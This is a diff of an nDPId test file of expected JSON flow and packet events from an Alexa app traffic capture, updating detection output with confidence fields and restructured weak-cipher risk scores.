 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="}
@@ -509,52 +509,52 @@
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1490976090796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1490976090796,"pkt":"AMDKkaPvePiC0\/vCCABFAABJWlpAAEARM1CsECrYrBAqAYuOADUANbcep0QBAAABAAAAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQAB"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1490976090982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"ts_msec":1490976090982,"pkt":"ePiC0\/vCAMDKkaPvCABFAAB13VlAAEARsCSsECoBrBAq2AA1i44AYd1op0SBgAABAAIAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQABwAwABQABAAAADgAQDXMzLWV4dGVybmFsLTHAGsA5AAEAAQAAAAQABDbnSFg="}
